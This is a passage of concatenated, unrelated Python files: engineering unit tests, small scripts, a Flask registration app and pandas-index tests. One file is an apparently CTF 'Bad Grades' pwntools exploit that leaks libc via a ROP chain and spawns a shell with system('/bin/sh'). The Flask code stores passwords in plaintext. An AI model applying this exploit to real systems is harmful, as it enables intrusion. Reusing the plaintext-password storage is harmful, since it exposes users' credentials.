3550*u.rpm) assert_close(SS.to_base_units().magnitude, 2.3570565251512066) assert dict(SS.dimensionality) == {u'[length]': 0.75, u'[time]': -1.5} v = Geldart_Ling(1.*u.kg/u.s, 1.2*u.kg/u.m**3, 0.1*u.m, 2E-5*u.Pa*u.s) assert_close(v.to_base_units().magnitude, 7.467495862402707) assert dict(v.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} s = speed_synchronous(50*u.Hz, poles=12) assert_close(s.to_base_units().magnitude, 157.07963267948966) assert dict(s.dimensionality) == {u'[time]': -1.0} t = t_from_gauge(.2, False, 'AWG') assert_close(t.to_base_units().magnitude, 0.5165) assert dict(t.dimensionality) == {u'[length]': 1.0} dP = Robbins(G=2.03*u.kg/u.m**2/u.s, rhol=1000*u.kg/u.m**3, Fpd=24/u.ft, L=12.2*u.kg/u.m**2/u.s, rhog=1.1853*u.kg/u.m**3, mul=0.001*u.Pa*u.s, H=2*u.m) assert_close(dP.to_base_units().magnitude, 619.662459344 ) assert dict(dP.dimensionality) == {u'[length]': -1.0, u'[mass]': 1.0, u'[time]': -2.0} dP = dP_packed_bed(dp=8E-4*u.m, voidage=0.4, vs=1E-3*u.m/u.s, rho=1E3*u.kg/u.m**3, mu=1E-3*u.Pa*u.s) assert_close(dP.to_base_units().magnitude, 1438.28269588 ) assert dict(dP.dimensionality) == {u'[length]': -1.0, u'[mass]': 1.0, u'[time]': -2.0} dP = dP_packed_bed(dp=8E-4*u.m, voidage=0.4*u.dimensionless, vs=1E-3*u.m/u.s, rho=1E3*u.kg/u.m**3, mu=1E-3*u.Pa*u.s, Dt=0.01*u.m) assert_close(dP.to_base_units().magnitude, 1255.16256625) assert dict(dP.dimensionality) == {u'[length]': -1.0, u'[mass]': 1.0, u'[time]': -2.0} n = C_Chezy_to_n_Manning(26.15*u.m**0.5/u.s, Rh=5*u.m) assert_close(n.to_base_units().magnitude, 0.05000613713238358) assert dict(n.dimensionality) == {u'[length]': -0.3333333333333333, u'[time]': 1.0} Q = Q_weir_rectangular_SIA(0.2*u.m, 0.5*u.m, 1*u.m, 2*u.m) assert_close(Q.to_base_units().magnitude, 1.0408858453811165) assert dict(Q.dimensionality) == {u'[length]': 3.0, u'[time]': -1.0} t = agitator_time_homogeneous(D=36*.0254*u.m, N=56/60.*u.revolutions/u.second, P=957.*u.W, T=1.83*u.m, H=1.83*u.m, mu=0.018*u.Pa*u.s, rho=1020*u.kg/u.m**3, homogeneity=.995) assert_close(t.to_base_units().magnitude, 15.143198226374668) assert dict(t.dimensionality) == {u'[time]': 1.0} K = K_separator_Watkins(0.88*u.dimensionless, 985.4*u.kg/u.m**3, 1.3*u.kg/u.m**3, horizontal=True) assert_close(K.to_base_units().magnitude, 0.07951613600476297, rtol=1e-2) assert dict(K.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} A = current_ideal(V=120*u.V, P=1E4*u.W, PF=1, phase=1) assert_close(A.to_base_units().magnitude, 83.33333333333333) assert dict(A.dimensionality) == {u'[current]': 1.0} fd = friction_factor(Re=1E5, eD=1E-4) assert_close(fd.to_base_units().magnitude, 0.01851386607747165) assert dict(fd.dimensionality) == {} K = Cv_to_K(2.712*u.gallon/u.minute, .015*u.m) assert_close(K.to_base_units().magnitude, 14.719595348352552) assert dict(K.dimensionality) == {} Cv = K_to_Cv(16, .015*u.m) assert_close(Cv.to_base_units().magnitude, 0.0001641116865931214) assert dict(Cv.dimensionality) == {u'[length]': 3.0, u'[time]': -1.0} Cd = drag_sphere(200) assert_close(Cd.to_base_units().magnitude, 0.7682237950389874) assert dict(Cd.dimensionality) == {} V, D = integrate_drag_sphere(D=0.001*u.m, rhop=2200.*u.kg/u.m**3, rho=1.2*u.kg/u.m**3, mu=1.78E-5*u.Pa*u.s, t=0.5*u.s, V=30*u.m/u.s, distance=True) assert_close(V.to_base_units().magnitude, 9.686465044063436) assert dict(V.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} assert_close(D.to_base_units().magnitude, 7.829454643649386) assert dict(D.dimensionality) == {u'[length]': 1.0} Bo = Bond(1000*u.kg/u.m**3, 1.2*u.kg/u.m**3, .0589*u.N/u.m, 2*u.m) assert_close(Bo.to_base_units().magnitude, 665187.2339558573) assert dict(Bo.dimensionality) == {} head = head_from_P(P=98066.5*u.Pa, rho=1000*u.kg/u.m**3) assert_close(head.to_base_units().magnitude, 10.000000000000002) assert dict(head.dimensionality) == {u'[length]': 1.0} roughness = roughness_Farshad('Cr13, bare', 0.05*u.m) assert_close(roughness.to_base_units().magnitude, 5.3141677781137006e-05) assert dict(roughness.dimensionality) == {u'[length]': 1.0} def test_custom_wraps(): A = A_multiple_hole_cylinder(0.01*u.m, 0.1*u.m, [(0.005*u.m, 1)]) assert_close(A.to_base_units().magnitude, 0.004830198704894308) assert dict(A.dimensionality) == {u'[length]': 2.0} V = V_multiple_hole_cylinder(0.01*u.m, 0.1*u.m, [(0.005*u.m, 1)]) assert_close(V.to_base_units().magnitude, 5.890486225480862e-06) assert dict(V.dimensionality) == {u'[length]': 3.0} # custom compressible flow model wrappers functions = [Panhandle_A, Panhandle_B, Weymouth, Spitzglass_high, Oliphant, Fritzsche] values = [42.56082051195928, 42.35366178004172, 32.07729055913029, 29.42670246281681, 28.851535408143057, 39.421535157535565] for f, v in zip(functions, values): ans = f(D=0.340*u.m, P1=90E5*u.Pa, P2=20E5*u.Pa, L=160E3*u.m, SG=0.693, Tavg=277.15*u.K) assert_pint_allclose(ans, v, {u'[length]': 3.0, u'[time]': -1.0}) ans = IGT(D=0.340*u.m, P1=90E5*u.Pa, P2=20E5*u.Pa, L=160E3*u.m, SG=0.693, mu=1E-5*u.Pa*u.s, Tavg=277.15*u.K) assert_pint_allclose(ans, 48.92351786788815, {u'[length]': 3.0, u'[time]': -1.0}) ans = Muller(D=0.340*u.m, P1=90E5*u.Pa, P2=20E5*u.Pa, L=160E3*u.m, SG=0.693, mu=1E-5*u.Pa*u.s, Tavg=277.15*u.K) assert_pint_allclose(ans, 60.45796698148659, {u'[length]': 3.0, u'[time]': -1.0}) nu = nu_mu_converter(rho=1000*u.kg/u.m**3, mu=1E-4*u.Pa*u.s) assert_pint_allclose(nu, 1E-7, {u'[length]': 2.0, u'[time]': -1.0}) mu = nu_mu_converter(rho=1000*u.kg/u.m**3, nu=1E-7*u.m**2/u.s) assert_pint_allclose(mu, 1E-4, {u'[time]': -1.0, u'[length]': -1.0, u'[mass]': 1.0}) SA = SA_tank(D=1.*u.m, L=0*u.m, sideA='ellipsoidal', sideA_a=2*u.m, sideB='ellipsoidal', sideB_a=2*u.m)[0] assert_pint_allclose(SA, 10.124375616183064, {u'[length]': 2.0}) SA, sideA_SA, sideB_SA, lateral_SA = SA_tank(D=1.*u.m, L=0*u.m, sideA='ellipsoidal', sideA_a=2*u.m, sideB='ellipsoidal', sideB_a=2*u.m) expect = [10.124375616183064, 5.062187808091532, 5.062187808091532, 0] for value, expected in zip([SA, sideA_SA, sideB_SA, lateral_SA], expect): assert_pint_allclose(value, expected, {u'[length]': 2.0}) m = isothermal_gas(rho=11.3*u.kg/u.m**3, fd=0.00185*u.dimensionless, P1=1E6*u.Pa, P2=9E5*u.Pa, L=1000*u.m, D=0.5*u.m) assert_pint_allclose(m, 145.484757, {u'[mass]': 1.0, u'[time]': -1.0}) def test_db_functions(): # dB ans = control_valve_noise_g_2011(m=2.22*u.kg/u.s, P1=1E6*u.Pa, P2=7.2E5*u.Pa, T1=450*u.K, rho=5.3*u.kg/u.m**3, gamma=1.22, MW=19.8*u.g/u.mol, Kv=77.85*u.m**3/u.hour, d=0.1*u.m, Di=0.2031*u.m, FL=None, FLP=0.792, FP=0.98, Fd=0.296, t_pipe=0.008*u.m, rho_pipe=8000.0*u.kg/u.m**3, c_pipe=5000.0*u.m/u.s, rho_air=1.293*u.kg/u.m**3, c_air=343.0*u.m/u.s, An=-3.8, Stp=0.2) # assert_pint_allclose(ans, 91.67702674629604, {}) def test_check_signatures(): from fluids.units import check_args_order for name in dir(fluids): obj = getattr(fluids, name) if isinstance(obj, types.FunctionType): if hasattr(obj, 'func_name') and obj.func_name == '<lambda>': continue # 2 if hasattr(obj, '__name__') and obj.__name__ == '<lambda>': continue # 3 check_args_order(obj) def test_differential_pressure_meter_solver(): m = differential_pressure_meter_solver(D=0.07366*u.m, D2=0.05*u.m, P1=200000.0*u.Pa, P2=183000.0*u.Pa, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(m, 7.702338035732167, {'[mass]': 1, '[time]': -1}) P1 = differential_pressure_meter_solver(D=0.07366*u.m, D2=0.05*u.m, m=m, P2=183000.0*u.Pa, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(P1, 200000, {'[length]': -1, '[mass]': 1, '[time]': -2}) P2 = differential_pressure_meter_solver(D=0.07366*u.m, D2=0.05*u.m, P1=200000.0*u.Pa, m=m, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(P2, 183000, {'[length]': -1, '[mass]': 1, '[time]': -2}) D2 = differential_pressure_meter_solver(D=0.07366*u.m, m=m, P1=200000.0*u.Pa, P2=183000.0*u.Pa, rho=999.1*u.kg/u.m**3, mu=0.0011*u.Pa*u.s, k=1.33*u.dimensionless, meter_type='ISO 5167 orifice', taps='D') assert_pint_allclose(D2, .05, {'[length]': 1}) def test_Tank_units_full(): T1 = TANK(L=3*u.m, D=150*u.cm, horizontal=True, sideA=None, sideB=None) # test all methods V = T1.V_from_h(0.1*u.m, 'full') assert_pint_allclose(V, 0.151783071377, u.m**3) h = T1.h_from_V(0.151783071377*u.m**3, method='brenth') assert_pint_allclose(h, 0.1, u.m) h = T1.h_from_V(0.151783071377*u.m**3, 'brenth') assert_pint_allclose(h, 0.1, u.m) # Check the table and approximations T1.set_table(dx=1*u.cm) assert 151 == len(T1.volumes) assert_pint_allclose1d(T1.heights[0:3], [0, 0.01, 0.02], u.m) T1.set_table(n=10) assert 10 == len(T1.volumes) T1.set_table(n=10*u.dimensionless) assert 10 == len(T1.volumes) T1.set_chebyshev_approximators(8, 8) T1.set_chebyshev_approximators(8*u.dimensionless, 8) T1.set_chebyshev_approximators(8, 8*u.dimensionless) assert 16 == len(T1.c_forward) assert 16 == len(T1.c_backward) # Check the properties assert_pint_allclose(T1.h_max, 1.5, u.m) assert_pint_allclose(T1.V_total, 5.301437602932776, u.m**3) assert_pint_allclose(T1.L_over_D, 2, u.dimensionless) assert_pint_allclose(T1.A_sideA, 1.76714586764, u.m**2) assert_pint_allclose(T1.A_sideB, 1.76714586764, u.m**2) assert_pint_allclose(T1.A_lateral, 14.1371669412, u.m**2) assert_pint_allclose(T1.A, 17.6714586764, u.m**2) def test_HelicalCoil_units(): C2 = HelicalCoil(Do=30*u.cm, H=20*u.cm, pitch=5*u.cm, Dt=2*u.cm) C3 = HelicalCoil(2*u.cm, 30*u.cm, 5*u.cm, 20*u.cm) for C1 in [C2, C3]: assert_pint_allclose(C1.Dt, 0.02, u.m) assert_pint_allclose(C1.Do, 0.3, u.m) assert_pint_allclose(C1.Do_total, 0.32, u.m) assert_pint_allclose(C1.pitch, 0.05, u.m) assert_pint_allclose(C1.H, 0.2, u.m) assert_pint_allclose(C1.H_total, 0.22, u.m) assert_pint_allclose(C1.N, 4, u.dimensionless) assert_pint_allclose(C1.tube_circumference, 0.942477796077, u.m) assert_pint_allclose(C1.tube_length, 3.7752126215, u.m) assert_pint_allclose(C1.surface_area, 0.237203604749 , u.m**2) assert_pint_allclose(C1.curvature, 0.06, u.dimensionless) assert_pint_allclose(C1.helix_angle, 0.0530019606897, u.radians) def test_ATMOSPHERE_1976_units(): five_km = ATMOSPHERE_1976(5000*u.m) assert_pint_allclose(five_km.T, 255.675543222, u.K) assert_pint_allclose(five_km.P, 54048.2861458, u.Pa) assert_pint_allclose(five_km.rho, 0.73642842078, u.kg/u.m**3) assert_pint_allclose(five_km.g, 9.79124107698, u.m/u.s**2) assert_pint_allclose(five_km.mu, 1.62824813536e-05, u.Pa*u.s) assert_pint_allclose(five_km.k, 0.0227319029514, u.W/u.K/u.m) assert_pint_allclose(five_km.v_sonic, 320.54551967, u.m/u.s) assert_pint_allclose(five_km.sonic_velocity(300*u.K), 347.220809082, u.m/u.s) # Test the staticmethod works alone assert_pint_allclose(ATMOSPHERE_1976.sonic_velocity(300*u.K), 347.220809082, u.m/u.s) # Check AttribtueError is property raised on __getstate__ for classes # as they now have a __getattr_ method import copy copy.copy(five_km) copy.deepcopy(five_km) def test_ATMOSPHERE_NRLMSISE00(): a = ATMOSPHERE_NRLMSISE00(Z=1E3*u.m, latitude=45*u.degrees, longitude=45*u.degrees, day=150*u.day) assert_pint_allclose(a.T, 285.544086062, u.K) assert_pint_allclose(a.rho, 1.10190620264, u.kg/u.m**3) assert_pint_allclose(a.O2_density, 4.80470350725e+24, u.count/u.m**3) assert_pint_allclose(a.day, 12960000, u.day)
python
vel = float(input('Velocidade do veículo: ')) velMax = 80 taxa= 7.00 if(vel > velMax): multa = (vel - velMax) * taxa print('Você ultrapassou o limite de velocidade! Pagar multa de R${:.2f}'.format(multa)) print('Dirija com Cuidado!')
python
import csv from django.db import transaction from django_dynamic_fixture.django_helper import get_apps, get_models_of_an_app def color(color, string): return '\033[1;{}m{}\033[0m'.format(color, string) def white(string): return color('37', string) def red(string): return color('91', string) def green(string): return color('92', string) def ddf_check_models(application_labels=[], exclude_application_labels=[], csv_filename='ddf_compatibility_report.csv'): from django_dynamic_fixture import get succeeded = {} errors = {} for app_label in get_apps(application_labels, exclude_application_labels): models = get_models_of_an_app(app_label) for model_class in models: ref = '{}.{}'.format(app_label, model_class.__name__) try: with transaction.atomic(): get(model_class) succeeded[ref] = None except Exception as e: errors[ref] = '[{}] {}'.format(type(e), str(e)) console_report(succeeded, errors) if csv_filename: csv_report(succeeded, errors, filename=csv_filename) return succeeded, errors def console_report(succeeded, errors): print(green('\nModels that DDF can create using the default settings.\n')) for i, (ref, _) in enumerate(succeeded.items(), start=1): i = str(i).zfill(3) print(white('{}. {}: '.format(i, ref)) + green('succeeded')) print(red('\nModels that requires some customisation.\n')) for i, (ref, error) in enumerate(errors.items(), start=1): i = str(i).zfill(3) print(white('{}. {}: '.format(i, ref)) + red(error)) def csv_report(succeeded, errors, filename): with open(filename, 'w') as f: f.write(','.join(['#', 'Model', 'Succeeded', '\n'])) for i, (ref, _) in enumerate(succeeded.items(), start=1): f.write(','.join([str(i), ref, 'succeeded', '\n'])) f.write(','.join(['#', 'Model', 'Error', '\n'])) for i, (ref, error) in enumerate(errors.items(), start=1): f.write(','.join([str(i), ref, error, '\n']))
python
#!/usr/bin/env python import pathlib import yaml from rich import print from netmiko import ConnectHandler def read_yaml(filename): with open(filename) as f: return yaml.safe_load(f) if __name__ == "__main__": # Load the .netmiko.yml file netmiko_yml = pathlib.PosixPath("~/.netmiko.yml") netmiko_yml = netmiko_yml.expanduser() my_devices = read_yaml(netmiko_yml) print() for device_name, device_dict in my_devices.items(): # Skip the groups if isinstance(device_dict, list): continue print(f"Connecting to -> {device_name}") with ConnectHandler(**device_dict) as nc: print(nc.find_prompt()) print() print() print()
python
# HTB - Bad Grades from pwn import * import struct p = process("./grades") # gdb.attach(p, "b *0x0401106") def make_double(address): val = p64(address).hex() return str(struct.unpack("d", bytes.fromhex(val))[0]) elf = ELF("./grades") libc = ELF("./libc.so.6") rop = ROP(elf) rop2 = ROP(libc) p.recvuntil(b'> ') p.sendline(b'2') p.recvuntil(b'Number of grades:') popRdi = rop.find_gadget(["pop rdi"])[0] puts_got = elf.got["puts"] puts_plt = elf.plt["puts"] main = 0x401108 p.sendline(b'39') for i in range(35): p.recvuntil(b']:') p.sendline(b'.') p.recvuntil(b']:') p.sendline(make_double(popRdi)) p.recvuntil(b']:') p.sendline(make_double(puts_got)) p.recvuntil(b']:') p.sendline(make_double(puts_plt)) p.recvuntil(b']:') p.sendline(make_double(main)) p.recvuntil(b'\n') leak = u64(p.recvuntil(b'\n').strip().ljust(8, b'\x00')) print(hex(leak), hex(libc.symbols["puts"])) libc.address = leak - libc.symbols["puts"] log.info("libc rebased to: " + hex(libc.address)) p.recvuntil(b'> ') p.sendline(b'2') p.recvuntil(b'Number of grades:') p.sendline(b'39') for i in range(35): p.recvuntil(b']:') p.sendline(b'.') ret = rop2.find_gadget(["ret"])[0] popRdi = rop2.find_gadget(["pop rdi", "ret"])[0] system = libc.symbols["system"] sh = next(libc.search(b'/bin/sh\x00')) p.recvuntil(b']:') p.sendline(make_double(ret)) p.recvuntil(b']:') p.sendline(make_double(popRdi)) p.recvuntil(b']:') p.sendline(make_double(sh)) p.recvuntil(b']:') p.sendline(make_double(system)) p.interactive()
python
from kiox.episode import Episode from kiox.step import StepBuffer from kiox.transition_buffer import UnlimitedTransitionBuffer from kiox.transition_factory import ( FrameStackTransitionFactory, SimpleTransitionFactory, ) from .utility import StepFactory def test_simple_transition_factory(): factory = StepFactory() episode = Episode(StepBuffer(), UnlimitedTransitionBuffer()) steps = [] for _ in range(10): steps.append(episode.append_step(factory())) transition_factory = SimpleTransitionFactory() for i in range(10): if i == 9: lazy_transition = transition_factory.create( step=steps[i], next_step=None, episode=episode, duration=1, gamma=0.99, ) assert lazy_transition.next_idx is None else: lazy_transition = transition_factory.create( step=steps[i], next_step=steps[i + 1], episode=episode, duration=1, gamma=0.99, ) assert lazy_transition.next_idx is steps[i + 1].idx assert lazy_transition.curr_idx is steps[i].idx assert lazy_transition.multi_step_reward == steps[i].reward assert lazy_transition.duration == 1 def test_frame_stack_transition_factory(): factory = StepFactory(observation_shape=(1, 84, 84)) episode = Episode(StepBuffer(), UnlimitedTransitionBuffer()) steps = [] for _ in range(10): steps.append(episode.append_step(factory())) transition_factory = FrameStackTransitionFactory(n_frames=3) for i in range(10): if i == 9: lazy_transition = transition_factory.create( step=steps[i], next_step=None, episode=episode, duration=1, gamma=0.99, ) assert lazy_transition.next_idx is None else: lazy_transition = transition_factory.create( step=steps[i], next_step=steps[i + 1], episode=episode, duration=1, gamma=0.99, ) assert lazy_transition.next_idx is steps[i + 1].idx prev_frames = [step.idx for step in steps[max(i - 2, 0) : i]] assert lazy_transition.curr_idx is steps[i].idx assert lazy_transition.multi_step_reward == steps[i].reward assert lazy_transition.duration == 1 assert lazy_transition.prev_frames == prev_frames
python
from flask import Flask, render_template, request, session, url_for, redirect import pymysql.cursors from appdef import app, conn @app.route('/registerCustomer') def registerCustomer(): return render_template('registerCustomer.html') #Authenticates the register @app.route('/registerAuthCustomer', methods=['GET', 'POST']) def registerAuthCustomer(): #grabs information from the forms email = request.form['email'] name = request.form['name'] password = request.form['password'] building_number = request.form['building_number'] street = request.form['street'] city = request.form['city'] state = request.form['state'] phone_number = request.form['phone_number'] passport_number = request.form['passport_number'] passport_expiration = request.form['passport_expiration'] passport_country = request.form['passport_country'] date_of_birth = request.form['date_of_birth'] #cursor used to send queries cursor = conn.cursor() #executes query query = 'SELECT * FROM customer WHERE email = %s' cursor.execute(query, (email)) #stores the results in a variable data = cursor.fetchone() #use fetchall() if you are expecting more than 1 data row error = None if(data): #If the previous query returns data, then user exists error = "This user already exists" return render_template('registerCustomer.html', error = error) else: ins = 'INSERT INTO customer VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)' cursor.execute(ins, (email, name, password, building_number, street, city, state, phone_number, passport_number, passport_expiration, passport_country, date_of_birth)) conn.commit() cursor.close() return render_template('index.html') #Define route for register @app.route('/registerAgent') def registerAgent(): return render_template('registerAgent.html') @app.route('/registerAuthAgent', methods=['GET', 'POST']) def registerAuthAgent(): email = request.form['email'] password = request.form['password'] booking_agent_id = request.form['booking_agent_id'] cursor = conn.cursor() query = 'SELECT * FROM booking_agent WHERE email = %s' cursor.execute(query, (email)) data = cursor.fetchone() error = None if(data): error = "This user already exists" return render_template('registerAgent.html', error = error) else: ins = 'INSERT INTO booking_agent VALUES(%s, %s, %s)' cursor.execute(ins, (email, password, booking_agent_id)) conn.commit() cursor.close() conn.close() return render_template('index.html') @app.route('/registerStaff') def registerStaff(): return render_template('registerStaff.html') @app.route('/registerAuthStaff', methods=['GET', 'POST']) def registerAuthStaff(): username = request.form['username'] password = request.form['password'] first_name = request.form['first_name'] last_name = request.form['last_name'] date_of_birth = request.form['date_of_birth'] airline_name = request.form['airline_name'] cursor = conn.cursor() query = 'SELECT * FROM airline_staff WHERE username = %s' cursor.execute(query, (username)) data = cursor.fetchone() error = None if(data): error = "This user already exists" return render_template('registerStaff.html', error = error) else: ins = 'INSERT INTO airline_staff VALUES(%s, %s, %s, %s, %s, %s)' cursor.execute(ins, (username, password, first_name, last_name, date_of_birth, airline_name)) conn.commit() cursor.close() conn.close() return render_template('index.html')
python
from spaceone.inventory.connector.aws_sqs_connector.connector import SQSConnector
python
#!/usr/bin/env python # Copyright 2014-2015 Canonical Limited. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import sys import subprocess from charmhelpers.core import hookenv def default_execd_dir(): return os.path.join(os.environ['CHARM_DIR'], 'exec.d') def execd_module_paths(execd_dir=None): """Generate a list of full paths to modules within execd_dir.""" if not execd_dir: execd_dir = default_execd_dir() if not os.path.exists(execd_dir): return for subpath in os.listdir(execd_dir): module = os.path.join(execd_dir, subpath) if os.path.isdir(module): yield module def execd_submodule_paths(command, execd_dir=None): """Generate a list of full paths to the specified command within exec_dir. """ for module_path in execd_module_paths(execd_dir): path = os.path.join(module_path, command) if os.access(path, os.X_OK) and os.path.isfile(path): yield path def execd_run(command, execd_dir=None, die_on_error=True, stderr=subprocess.STDOUT): """Run command for each module within execd_dir which defines it.""" for submodule_path in execd_submodule_paths(command, execd_dir): try: subprocess.check_output(submodule_path, stderr=stderr, universal_newlines=True) except subprocess.CalledProcessError as e: hookenv.log("Error ({}) running {}. Output: {}".format( e.returncode, e.cmd, e.output)) if die_on_error: sys.exit(e.returncode) def execd_preinstall(execd_dir=None): """Run charm-pre-install for each module within execd_dir.""" execd_run('charm-pre-install', execd_dir=execd_dir)
python
"""Test the `crc` main function.""" from crc.bin.crc3 import crc import os import pytest # noqa: F401 import sys TEST_FILES_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), 'files')) TEST_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'tests')) def test_crc(): """Test crc functionality.""" crc( '{}/test_enhancers.bed'.format(TEST_FILES_DIR), 'HG19', '{}/Chromosomes/'.format(TEST_FILES_DIR), TEST_DIR, 'test', subpeak_file='{}/mock_regions.bed'.format(TEST_FILES_DIR), ) scores = [] with open(os.path.join(TEST_DIR, 'test_CLIQUE_SCORES_DEGREE.txt')) as infile: for line in infile: scores.append(float(line.split('\t')[1].strip('\n'))) if (sys.version_info > (3, 0)): test_scores = [8.25, 8.0, 7.75, 7.333333333333333] else: test_scores = [8.25, 8.0, 7.75, 7.33333333333] assert scores == test_scores, 'Clique scores do not match!'
python
import os from collections import namedtuple from typing import List, TypedDict from numpy.lib.arraysetops import isin FIT_URL = 'https://raw.githubusercontent.com/notemptylist/shinko/main/modelfits/arima/' FIT_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'modelfits', 'arima') FitSpec = namedtuple('FitSpec', ['stream', 'numlags', 'todo', 'results', 'tstamp']) fitspec_version = '0.1' class fitresult(TypedDict): order: tuple rmse: float mean: float tstamp: float class fitspec(TypedDict): stream: str numlags: int todo: List[tuple] results: List[fitresult] def make_spec(): s: fitspec = {'stream': '', 'numlags': 0, 'todo': [], 'results': [], 'version': fitspec_version } return s if __name__ == "__main__": import json fs: fitspec = {'stream': 'foo.json', 'numlags': 400, 'todo': [(0, 0, 1), (1, 6, 0)], 'results': [ {'order': (1, 1, 1), 'rmse': .90, 'mean': .20, 'tstamp': 12312312312 }, ], 'version': fitspec_version } print(fs) print(isinstance(fs, dict)) with open('foo.json', 'w') as fp: json.dump(fs, fp) with open('foo.json', 'r') as fp: foo = json.load(fp) print(foo) print(isinstance(foo, dict))
python
import os v = os.environ.get('SOME_KEY') if v.<caret>
python
# -*- coding: utf-8 -*- # ***************************************************************************** # Copyright (c) 2020, Intel Corporation All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ***************************************************************************** import numba import numpy as np import pandas as pd import unittest from itertools import (combinations_with_replacement, product, ) from sdc.tests.indexes.index_datagens import ( test_global_index_names, _generate_valid_int64_index_data, _generate_int64_indexes_fixed, get_sample_index, ) from sdc.tests.test_base import TestCase from sdc.datatypes.indexes import * class TestInt64Index(TestCase): def test_int64_index_type_inferred(self): for data in _generate_valid_int64_index_data(): for name in test_global_index_names: index = pd.Int64Index(data, name=name) with self.subTest(index=index): native_index_type = numba.typeof(index) self.assertIsInstance(native_index_type, Int64IndexType) def test_int64_index_create_and_box(self): def test_impl(data, name): return pd.Int64Index(data, name=name) sdc_func = self.jit(test_impl) name = 'index' for data in _generate_valid_int64_index_data(): with self.subTest(index_data=data): result = sdc_func(data, name) result_ref = test_impl(data, name) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_unbox_and_box(self): def test_impl(index): return index sdc_func = self.jit(test_impl) n = 11 for index in _generate_int64_indexes_fixed(n): with self.subTest(index=index): result = sdc_func(index) result_ref = test_impl(index) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_create_param_copy_true(self): def test_impl(arr): return pd.Int64Index(arr, copy=True) sdc_func = self.jit(test_impl) index_data_to_test = [ np.array([1, 2, 3, 5, 6, 3, 4], dtype=np.int64), list(np.array([1, 2, 3, 5, 6, 3, 4], dtype=np.int64)), pd.RangeIndex(11), pd.Int64Index([1, 2, 3, 5, 6, 3, 4]), ] for index_data in index_data_to_test: with self.subTest(index_data=index_data): result = sdc_func(index_data) result_ref = test_impl(index_data) pd.testing.assert_index_equal(result, result_ref) self.assertEqual(result._data is result_ref._data, False) def test_int64_index_create_param_copy_default(self): def test_impl(arr): return pd.Int64Index(arr) sdc_func = self.jit(test_impl) # only test data that has underlying array that can be referenced # and ensure it has int64 dtype as otherwise there will always be a copy index_data_to_test = [ np.array([1, 2, 3, 5, 6, 3, 4], dtype=np.int64), pd.Int64Index([1, 2, 3, 5, 6, 3, 4]), ] for index_data in index_data_to_test: with self.subTest(index_data=index_data): result = sdc_func(index_data) result_ref = test_impl(index_data) pd.testing.assert_index_equal(result, result_ref) self.assertEqual(result._data is result_ref._data, True) def test_int64_index_create_param_dtype(self): def test_impl(n, dtype): return pd.Int64Index(np.arange(n), dtype=dtype) sdc_func = self.jit(test_impl) n = 11 supported_dtypes = [None, np.int64, 'int64', np.int32, 'int32'] for dtype in supported_dtypes: with self.subTest(dtype=dtype): result = sdc_func(n, dtype) result_ref = test_impl(n, dtype) pd.testing.assert_index_equal(result, result_ref) def test_int64_index_create_param_dtype_invalid(self): def test_impl(n, dtype): return pd.Int64Index(np.arange(n), dtype=dtype) sdc_func = self.jit(test_impl) n = 11 invalid_dtypes = ['float', 'uint'] for dtype in invalid_dtypes: with self.subTest(dtype=dtype): with self.assertRaises(Exception) as context: test_impl(n, dtype) pandas_exception = context.exception with self.assertRaises(type(pandas_exception)) as context: sdc_func(n, dtype) sdc_exception = context.exception self.assertIn(str(sdc_exception), str(pandas_exception)) def test_int64_index_attribute_dtype(self): def test_impl(index): return index.dtype sdc_func = self.jit(test_impl) n = 11 index = pd.Int64Index(np.arange(n) * 2) result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_attribute_name(self): def test_impl(index): return index.name sdc_func = self.jit(test_impl) n = 11 index_data = np.arange(n) * 2 for name in test_global_index_names: with self.subTest(name=name): index = pd.Int64Index(index_data, name=name) result = sdc_func(index) result_ref = test_impl(index) self.assertEqual(result, result_ref) def test_int64_index_len(self): def test_impl(index): return len(index) sdc_func = self.jit(test_impl) n = 11 index = pd.Int64Index(np.arange(n) * 2, name='index') result = sdc_func(index) result_ref = 